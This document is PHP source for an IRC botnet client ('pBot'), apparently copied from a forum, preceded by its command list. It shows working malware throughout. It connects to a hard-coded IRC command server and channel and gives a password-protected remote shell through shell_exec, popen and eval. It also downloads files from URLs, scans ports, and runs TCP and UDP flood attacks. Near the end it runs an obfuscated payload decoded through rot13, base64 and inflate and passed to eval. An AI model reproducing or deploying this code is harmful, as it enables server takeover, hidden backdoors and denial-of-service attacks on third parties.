- 锘? COMMANDS ============================================================================
- .user <password> //login to the bot
- .logout //logout of the bot
- .die //kill the bot
- .restart //restart the bot
- .mail <to> <from> <subject> <msg> //send an email
- .dns <IP|HOST> //dns lookup
- .download <URL> <filename> //download a file
- .exec <cmd> // uses shell_exec() //execute a command
- .cmd <cmd> // uses popen() //execute a command
- .info //get system information
- .php <php code> // uses eval() //execute php code
- .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
- .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
- .raw <cmd> //raw IRC command FIXED by towzAo
- .rndnick //change nickname
- .pscan <host> <port> //port scan
- .ud.server <newhost> <newport> [newpass] //change IRC server
- ---------------------------------------------------------------------------------------
- <?
- set_time_limit(0);
- error_reporting(0);
- class pBot
- {
- var $config = array("server"=>"irc.jogjacodex.com",
- "port"=>6667,
- "pass"=>"", //senha do server
- "prefix"=>"codex",
- "maxrand"=>8,
- "chan"=>"#jogjacodex",
- "key"=>"", //senha do canal
- "modes"=>"+p",
- "password"=>"aryo", //senha do bot
- "trigger"=>".",
- "hostauth"=>"*" // * for any hostname
- );
- var $users = array();
- function start()
- {
- if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
- $this->start();
- $ident = "xd";
- $alph = range("a","z");
- for($i=0;$i<$this->config['maxrand'];$i++)
- $ident .= $alph[rand(0,25)];
- if(strlen($this->config['pass'])>0)
- $this->send("PASS ".$this->config['pass']);
- $this->send("USER $ident localhost :$ident");
- $this->set_nick();
- $this->main();
- }
- function main()
- {
- while(!feof($this->conn))
- {
- $this->buf = trim(fgets($this->conn,512));
- $cmd = explode(" ",$this->buf);
- if(substr($this->buf,0,6)=="PING :")
- {
- $this->send("PONG :".substr($this->buf,6));
- }
- if(isset($cmd[1]) && $cmd[1] =="001")
- {
- $this->send("MODE ".$this->nick." ".$this->config['modes']);
- $this->join($this->config['chan'],$this->config['key']);
- }
- if(isset($cmd[1]) && $cmd[1]=="433")
- {
- $this->set_nick();
- }
- if($this->buf != $old_buf)
- {
- $mcmd = array();
- $msg = substr(strstr($this->buf," :"),2);
- $msgcmd = explode(" ",$msg);
- $nick = explode("!",$cmd[0]);
- $vhost = explode("@",$nick[1]);
- $vhost = $vhost[1];
- $nick = substr($nick[0],1);
- $host = $cmd[0];
- if($msgcmd[0]==$this->nick)
- {
- for($i=0;$i<count($msgcmd);$i++)
- $mcmd[$i] = $msgcmd[$i+1];
- }
- else
- {
- for($i=0;$i<count($msgcmd);$i++)
- $mcmd[$i] = $msgcmd[$i];
- }
- if(count($cmd)>2)
- {
- switch($cmd[1])
- {
- case "QUIT":
- if($this->is_logged_in($host))
- {
- $this->log_out($host);
- }
- break;
- case "PART":
- if($this->is_logged_in($host))
- {
- $this->log_out($host);
- }
- break;
- case "PRIVMSG":
- if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
- {
- if(substr($mcmd[0],0,1)==".")
- {
- switch(substr($mcmd[0],1))
- {
- case "user":
- if($mcmd[1]==$this->config['password'])
- {
- $this->privmsg($this->config['chan'],"[\2Auth\2]: $nick logged in");
- $this->log_in($host);
- }
- else
- {
- $this->privmsg($this->config['chan'],"[\2Auth\2]: Incorrect password from $nick");
- }
- break;
- }
- }
- }
- elseif($this->is_logged_in($host))
- {
- if(substr($mcmd[0],0,1)==".")
- {
- switch(substr($mcmd[0],1))
- {
- case "restart":
- $this->send("QUIT :restart");
- fclose($this->conn);
- $this->start();
- break;
- case "mail": //mail to from subject message
- if(count($mcmd)>4)
- {
- $header = "From: <".$mcmd[2].">";
- if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
- {
- $this->privmsg($this->config['chan'],"[\2mail\2]: Unable to send");
- }
- else
- {
- $this->privmsg($this->config['chan'],"[\2mail\2]: Message sent to \2".$mcmd[1]."\2");
- }
- }
- break;
- case "dns":
- if(isset($mcmd[1]))
- {
- $ip = explode(".",$mcmd[1]);
- if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
- {
- $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
- }
- else
- {
- $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
- }
- }
- break;
- case "target":
- $this->privmsg($this->config['chan'],"[\2info\2]: [\2httpd\2: ".$_SERVER['SERVER_SOFTWARE']."] [\2docroot\2: ".$_SERVER['DOCUMENT_ROOT']."] [\2domain\2: ".$_SERVER['SERVER_NAME']."] [\2admin\2: ".$_SERVER['SERVER_ADMIN']."] [\2url\2:".$_SERVER['REQUEST_URI']."]");
- break;
- case "bot":
- $this->privmsg($this->config['chan'],"[\2Bot by Zcrew.Team| v1.0 [edited by towzAo]\2]");
- break;
- case "cmd":
- if(isset($mcmd[1]))
- {
- $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
- $this->privmsg($this->config['chan'],"[\2cmd\2]: $command");
- $pipe = popen($command,"r");
- while(!feof($pipe))
- {
- $pbuf = trim(fgets($pipe,512));
- if($pbuf != NULL)
- $this->privmsg($this->config['chan']," : $pbuf");
- }
- pclose($pipe);
- }
- break;
- case "rndnick":
- $this->set_nick();
- break;
- case "raw":
- $this->send(strstr($msg,$mcmd[1]));
- break;
- case "php":
- $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
- break;
- case "exec":
- $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
- $exec = shell_exec($command);
- $ret = explode("\n",$exec);
- $this->privmsg($this->config['chan'],"[\2exec\2]: $command");
- for($i=0;$i<count($ret);$i++)
- if($ret[$i]!=NULL)
- $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
- break;
- case "pscan": // .pscan 6667
- if(count($mcmd) > 2)
- {
- if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
- $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
- else
- $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
- }
- break;
- case "ud.server": // .udserver <server> <port> [password]
- if(count($mcmd)>2)
- {
- $this->config['server'] = $mcmd[1];
- $this->config['port'] = $mcmd[2];
- if(isset($mcmcd[3]))
- {
- $this->config['pass'] = $mcmd[3];
- $this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]." Pass: ".$mcmd[3]);
- }
- else
- {
- $this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]);
- }
- }
- break;
- case "download":
- if(count($mcmd) > 2)
- {
- if(!$fp = fopen($mcmd[2],"w"))
- {
- $this->privmsg($this->config['chan'],"[\2download\2]: Cannot download, permission denied.");
- }
- else
- {
- if(!$get = file($mcmd[1]))
- {
- $this->privmsg($this->config['chan'],"[\2download\2]: Unable to download from \2".$mcmd[1]."\2");
- }
- else
- {
- for($i=0;$i<=count($get);$i++)
- {
- fwrite($fp,$get[$i]);
- }
- $this->privmsg($this->config['chan'],"[\2download\2]: File \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2");
- }
- fclose($fp);
- }
- }
- break;
- case "die":
- $this->send("QUIT :die command from $nick");
- fclose($this->conn);
- exit;
- case "logout":
- $this->log_out($host);
- $this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged out");
- break;
- case "udpflood":
- if(count($mcmd)>3)
- {
- $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
- }
- break;
- case "tcpflood":
- if(count($mcmd)>5)
- {
- $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
- }
- break;
- }
- }
- }
- break;
- }
- }
- }
- $old_buf = $this->buf;
- }
- $this->start();
- }
- function send($msg)
- {
- fwrite($this->conn,"$msg\r\n");
- }
- function join($chan,$key=NULL)
- {
- $this->send("JOIN $chan $key");
- }
- function privmsg($to,$msg)
- {
- $this->send("PRIVMSG $to :$msg");
- }
- function is_logged_in($host)
- {
- if(isset($this->users[$host]))
- return 1;
- else
- return 0;
- }
- function log_in($host)
- {
- $this->users[$host] = true;
- }
- function log_out($host)
- {
- unset($this->users[$host]);
- }
- function set_nick()
- {
- if(isset($_SERVER['SERVER_SOFTWARE']))
- {
- if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
- $this->nick = "";
- elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
- $this->nick = "";
- elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
- $this->nick = "[X]";
- else
- $this->nick = "[U]";
- }
- else
- {
- $this->nick = "[C]";
- }
- $this->nick .= $this->config['prefix'];
- for($i=0;$i<$this->config['maxrand'];$i++)
- $this->nick .= mt_rand(0,9);
- $this->send("NICK ".$this->nick);
- }
- function udpflood($host,$packetsize,$time) {
- $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
- $packet = "";
- for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
- $timei = time();
- $i = 0;
- while(time()-$timei < $time) {
- $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
- fwrite($fp,$packet);
- fclose($fp);
- $i++;
- }
- $env = $i * $packetsize;
- $env = $env / 1048576;
- $vel = $env / $time;
- $vel = round($vel);
- $env = round($env);
- $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
- }
- function tcpflood($host,$packets,$packetsize,$port,$delay)
- {
- $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
- $packet = "";
- for($i=0;$i<$packetsize;$i++)
- $packet .= chr(mt_rand(1,256));
- for($i=0;$i<$packets;$i++)
- {
- if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
- {
- $this->privmsg($this->config['chan'],"[\2tcpflood\2]: Error: <$e>");
- return 0;
- }
- else
- {
- fwrite($fp,$packet);
- fclose($fp);
- }
- sleep($delay);
- }
- $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets packets to $host:$port.");
- }
- }
- $byPTeU='XY7BasMwEETvgfyDEIKVIXXuDqYKxMU9xbWdXpogVFuxRSXL2HIP/fpKTSi0e9jDzNuZXa/IMqkUeudGiBFlhFdZ+ZqVb5DXdVHBBT0imAElaFi0jlAMyXbryX8gz49V7eE/Rpm9nLKq5qfyGS679YrkKTzcB3akFU6kKPT7M5L70046OXxSfAvg+8OhxNHdhFlcZQIxU4PiHqQ4CNzYVv4ybOxHvgzCSOqloCBW5AU/Vr7dCKUpoC9r3pVsrNaycXZinbWdlsGMG2tg8/OQ3+G7DX6arEnQ7JZRtb1oPuTEbgEBPk/nAUc++hs=';$aUiMmA=';)))HrGClo$(rqbprq_46rfno(rgnysavmt(ynir';$veaZlT=strrev($aUiMmA);$MBAVHh=str_rot13($veaZlT);eval($MBAVHh);
- $bot = new pBot;
- $bot->start();
- ?>
复制代码 |